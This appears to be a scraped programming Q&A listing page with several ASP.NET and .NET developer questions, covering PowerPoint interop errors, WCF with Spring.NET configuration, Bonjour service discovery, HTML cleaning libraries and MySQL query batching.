System.ServiceModel.Dispatcher.DispatchOperationRuntime.InvokeBegin(MessageRpc&amp; rpc) at System.ServiceModel.Dispatcher.ImmutableDispatchRuntime.ProcessMessage5(MessageRpc&amp; rpc) at System.ServiceModel.Dispatcher.ImmutableDispatchRuntime.ProcessMessage4(MessageRpc&amp; rpc) at System.ServiceModel.Dispatcher.ImmutableDispatchRuntime.ProcessMessage3(MessageRpc&amp; rpc) at System.ServiceModel.Dispatcher.ImmutableDispatchRuntime.ProcessMessage2(MessageRpc&amp; rpc) at System.ServiceModel.Dispatcher.ImmutableDispatchRuntime.ProcessMessage1(MessageRpc&amp; rpc) at System.ServiceModel.Dispatcher.MessageRpc.Process(Boolean isOperationContextSet) </StackTrace> <ExceptionString>System.NullReferenceException: Object reference not set to an instance of an object. at System.Data.Services.Providers.ObjectContextServiceProvider.PopulateMemberMetadata(ResourceType resourceType, MetadataWorkspace workspace, IDictionary2 entitySets, IDictionary2 knownTypes) at System.Data.Services.Providers.ObjectContextServiceProvider.PopulateMetadata(IDictionary2 knownTypes, IDictionary2 entitySets) at System.Data.Services.Providers.BaseServiceProvider.P

    Read the article

  • Problems with office automation in asp.net. I can use alternatives such as open-office, if I knew ho

    - by Vinicius Melquiades
    I have a ASP.NET 2.0 web application that should upload a ppt file and then extract its slides to images. For that I have imported office.dll and Microsoft.Office.Interop.PowerPoint.dll assemblies and wrote the following code public static int ExtractImages(string ppt, string targetPath, int width, int height) { var pptApplication = new ApplicationClass(); var pptPresentation = pptApplication.Presentations.Open(ppt, MsoTriState.msoTrue, MsoTriState.msoFalse, MsoTriState.msoFalse); var slides = new List<string>(); for (var i = 1; i <= pptPresentation.Slides.Count; i++) { var target = string.Format(targetPath, i); pptPresentation.Slides[i].Export(target, "jpg", width, height); slides.Add(new FileInfo(target).Name); } pptPresentation.Close(); return slides.Count; } If I run this code in my local machine, in asp.net or a executable, it runs perfectly. But If I try running it in the production server, I get the following error: System.Runtime.InteropServices.COMException (0x80004005): PowerPoint could not open the file. at Microsoft.Office.Interop.PowerPoint.Presentations.Open(String FileName, MsoTriState ReadOnly, MsoTriState Untitled, MsoTriState WithWindow) at PPTImageExtractor.PptConversor.ExtractImages(String caminhoPpt, String caminhoDestino, Int32 largura, Int32 altura, String caminhoThumbs, Int32 larguraThumb, Int32 alturaThumb, Boolean geraXml) at Upload.ProcessRequest(HttpContext context) The process is running with the user NT AUTHORITY\NETWORK SERVICE. IIS is configured to use anonymous authentication. The anonymous user is an administrator, I set it like this to allow the application to run without having to worry about permissions. In my development machine I have office 2010 beta1. I have tested with the executable in a pc with office 2007 as well. And if I run the code from the executable in the server, with office 2003 installed, it runs perfectly. To ensure that there wouldn't be any problems with permissions, everyone in the server has full access to the web site. The website is running in IIS7 and Classic Mode. I also heard that Open-office has an API that should be able to do this, but I couldn't find anything about it. I don't mind using DLLImport to do what I have to do and I can install open-office on the web server. Don't worry about rewriting this method, as long as the parameters are the same, everything will work. I appreciate your help. ps: Sorry for bad English.

    Read the article

  • How to track Google Analytics Events in Server Side asp.net?

    - by Raj
    Hello, Is there a way to track Google Analytics Events from Server Side in ASP.NET, the requirement is the the Event should be tracked on button click after some functionalities are executed on Serverside. ? OnClientClick of button, we cannot fulfill this requirement completely as some time serverside functionalities can fail but the event will get tracked in Google? Please help me in this regard. Appreciate expert answers. Thanks in Advance, Raj

    Read the article

  • Managed (.net) library with html-tidy like functionality?

    - by Eamon Nerbonne
    Does anybody know of an html cleaner for .NET that can parse html and (for instance) convert it to a more machine friendly format such as xhtml? I've tried the HTML Agility Pack, but that fails to correctly parse even fairly simple examples. To give an example of html that should be parsed correctly: <html><body> <ul><li>TestElem1 <li>TestElem2 <li>TestElem3 List: <ul><li>Nested1 <li>Nested2</li> <li>Nested3 </ul> <li>TestElem4 </ul> <p>paragraph 1 <p>paragraph 2 <p>paragraph 3 </body></html> li tags don't need to be closed (see spec), and neither do P tags. In other words, the above sample should be parsed as: <html><body> <ul><li>TestElem1</li> <li>TestElem2</li> <li>TestElem3 List: <ul><li>Nested1</li> <li>Nested2</li> <li>Nested3</li> </ul></li> <li>TestElem4</li> </ul> <p>paragraph 1</p> <p>paragraph 2</p> <p>paragraph 3</p> </body></html> Since the aim is to use the library on various machines, it's a big disadvantage to need to fall back to native code (such as a wrapper around html tidy) which would require extra deployment hassle and sacrifice platform independance. Any suggestions? To recap, I'm looking for: An html cleaner ala HTML tidy Must be able to deal with real world html, not just xhtml, at the very least correctly reading valid html 4 Must be able to convert to a more easily processable xml format Should be a purely managed app.

    Read the article

  • ASP.NET How can I write a message on the screen without the end user removing it?

    - by LeeW
    I have written a ASP.NET program for a customer, I want to add a message similar to "Preview version, ABD Consulting" on the master.master page, I had thought to use Response.write but it messes up the look of the page as it seems to move page elemets. If I use a label the customer can remove it from the Master.master file, any suggestions? The customer is in a different country so I want to ensure I'm paid. Many thanks

    Read the article

  • WCF using Spring.NET woes

    - by demius
    Hi everyone, I've torn out all but two hairs on my head trying to get my WCF services hosted in IIS 7.5. I'm using Spring.NET to create my service instances, but I'm having no luck getting it up and running. I encounter the following exception: Could not find a base address that matches scheme http for the endpoint with binding MetadataExchangeHttpBinding. Registered base address schemes are []. My WCF configuration is as follows: <system.serviceModel> <bindings> <wsHttpBinding> <binding name="secureBinding" allowCookies="false"> <security mode="Transport"> <transport clientCredentialType="None"> <extendedProtectionPolicy policyEnforcement="Never" /> </transport> </security> </binding> </wsHttpBinding> </bindings> <behaviors> <serviceBehaviors> <behavior> <serviceMetadata httpGetEnabled="true" httpsGetEnabled="true" /> <serviceDebug includeExceptionDetailInFaults="false" /> </behavior> </serviceBehaviors> </behaviors> <services> <service name="TestService"> <host> <baseAddresses> <add baseAddress="https://ws.local.com/TestService.svc"/> </baseAddresses> </host> <endpoint name="secureEndpoint" contract="Services.Interfaces.ITestService" binding="wsHttpBinding" bindingConfiguration="secureBinding" address="https://ws.local.com/TestService.svc" /> <endpoint address="mex" binding="mexHttpBinding" contract="IMetadataExchange" /> </service> </services> <serviceHostingEnvironment multipleSiteBindingsEnabled="true" /> What am I missing here?

    Read the article

  • Using Apple’s Bonjour service from .NET?

    - by Martín Marconcini
    I have an iPhone app that publishes through Bonjour. The Mac counterpart works, they sync and exchange data. Now I have to port that little Mac app to Windows. I’ve decided to go with .NET (because that’s what I know). The app is not complex, but I’m in the early stages. I need to browse/discover Bonjour services. For this task, I’ve downloaded Mono.Zeroconf and Apple’s latest SDK (which includes a couple of C# Samples). I’m not really pasting code because I’m really copy/pasting the samples. In fact, Mono.Zeroconf has a MZClient.exe that can be used to test “all the API”. My 1st test was -on the same box- open two cmd.exe and launch a MZclient registering a service and on the other, launch it and “discover it”. It doesn’t work. Here’s the server: C:\MZ>MZClient -v -p "_http._tcp 80 mysimpleweb” *** Registering name = 'mysimpleweb', type = '_http._tcp', domain = 'local.' *** Registered name = ‘mysimpleweb’ On the other terminal: c:\MZ>MZClient -v -t "_http._tcp" Creating a ServiceBrowser with the following settings: Interface = 0 (All) Address Protocol = Any Domain = local Registration Type = _http._tcp Resolve Shares = False Hit ^C when you're bored waiting for responses. And that’s it. Nothing happens. I’ve of course tried with different services to no avail. Even played a little bit with that domain thing. Remember this is the same box. I tried on another computer, because this was a VM inside OSX, so I went ahead and tried on a “pure” win XP. Nothing. note: I have Apple Bonjour Service (up and running) and also the Apple SDK (installed later). Given that this didn’t work, I went ahead and decided to try the Apple SDK which has an Interop and a few pre-compiled samples (and its source code). Short story, neither the mDSNBrowser.exe nor the SimpleChat.exe work/see/discover anything. My box is a Win7 under Parallels, but that doesn’t seem to be affecting anything, given that the native XP exhibits the same problems. What am I doing so awfully wrong?

    Read the article

  • MySql multiple selects batching in .net

    - by Amith George
    I have a situation in my application. For each x-axis point in my chart, I am plotting 5 y-axis values. To calculate each of these 5 values, I need to make 4 different queries. Ie, for each x-axis point I need to fire 20 sql queries. Now, I need to plot 40 such points in the my chart. Its resulting in a pathetic performance where it takes close to a minute to get all the data back from the database. Each of 4 different queries consists of a join between 2 tables. One has only 6 rows. The other close to 10,000. Each of the 4 queries has different WHERE clauses, so they are different queries. For each point in the x-axis, only the values for the where clauses change. I have tried combining each of the 4 queries into one big string. Basically batch the four selects. These are again batched for each y-axis value. So, for each x-axis point, I am now firing one big command that consists of 20 different select statements. Technically, I should be experiencing a big performance boost, right? Instead of hitting the db 40x5x4 = 800 times, I am now hitting it just 40 times. But instead of taking 60 seconds, it taking 50-55 seconds... not much of a help. I am using MySql 5.1, and the 6.1 version of its .Net connector. What can I do to improve the performance? Edit: One of the 4 queries is as follows: SELECT SUM(TIME_TO_SEC(TIMEDIFF(T1.col2, T1.col1))* T2.col1 / (3600 *1000)) AS TotalTime FROM Table T1 JOIN Table T2 ON T1.col3 = T2.col3 WHERE T1.col4 = 'i' AND T1.col1 >= '2009-12-25 00:00:00' AND T1.col2 <= '2009-12-26 00:00:00'; The other 3 queries are similar, only the where clause changes slightly. This set of 4 queries is fired 5 times. The first 3 times against the join of table T1 and T2, passing in different values for col4. And the next two times against the join of table T3 and T2 passing in different values for col4. These 5 values are the y-axis values for a particular x-axis point. The data returned by all these queries is the same format. so, we tried doing a UNION ALL on all these queries. No substantial difference. One strange thing, however, after indexing the foreign key on the table T1 [while it contained over a lakh records], the queries were using the index, but they had become slower. At times, the queries would take double the time to return the data.

    Read the article

< Previous Page | 569 570 571 572 573 574 575 576 577 578 579 580  | Next Page >